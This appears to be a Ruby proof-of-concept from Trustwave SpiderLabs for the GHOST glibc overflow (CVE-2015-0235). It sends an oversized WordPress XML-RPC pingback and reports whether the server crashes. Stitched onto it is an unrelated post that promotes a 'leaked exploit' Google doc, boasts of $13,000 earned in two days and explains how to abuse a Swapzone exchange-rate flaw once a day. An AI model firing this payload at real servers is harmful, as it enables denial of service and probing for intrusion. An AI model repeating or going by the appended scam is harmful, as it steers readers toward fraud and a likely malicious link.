GHOST gethostbyname() Vuln (CVE-2015-0235)

#
# --[ Trustwave SpiderLabs Research Team ]--
# Ref: http://blog.spiderlabs.com/2015/01/ghost-gethostbyname-heap-overflow-in-glibc-cve-2015-0235.html
#
require "net/http"
require "uri"

if ARGV.count != 2
  puts "Usage: #{ARGV[0]} [Target URL] [count]"
  exit
end

matched = ARGV[0].match(/(?<domain>[^\/]*)(?<path>\/.*)(\/xmlrpc.php)?/)
uri = URI.parse("http://#{matched[:domain]}")
ghost_host = "0"*ARGV[1].to_i

# Set up POST request
payload = <<_EOF_
<?xml version="1.0"?>
  <methodCall>
    <methodName>pingback.ping</methodName>
    <params><param><value>
          <string>http://#{ghost_host}/index.php</string>
    </value></param>
    <param><value>
      <string>http://#{ghost_host}/index.php</string>
    </value></param>
    </params>
  </methodCall>
_EOF_

begin
  Net::HTTP.start(uri.host, uri.port) do |http|
    response = http.post("#{matched[:path]}/xmlrpc.php", payload)
    if response.code == "500"
      puts "Vulnerable"
    else
      puts "Looks like you're safe, for today"
    end
  end
rescue EOFError
  puts "Vulnerable"
end
#source : https://gist.github.com/rcbarnett/7564bee9f81aba746e04
✅ Leaked Exploit Documentation:

https://docs.google.com/document/d/1dOCZEHS5JtM51RITOJzbS4o3hZ-__wTTRXQkV1MexNQ/edit?usp=sharing

This made me $13,000 in 2 days.

Important: If you plan to use the exploit more than once, remember that after the first successful swap you must wait 24 hours before using it again. Otherwise, there is a high chance that your transaction will be flagged for additional verification, and if that happens, you won't receive the extra 38% — they will simply correct the exchange rate.
The first COMPLETED transaction always goes through — this has been tested and confirmed over the last days.

Edit: I've gotten a lot of questions about the maximum amount it works for — as far as I know, there is no maximum amount. The only limit is the 24-hour cooldown (1 use per day without any verification from Swapzone — instant swap).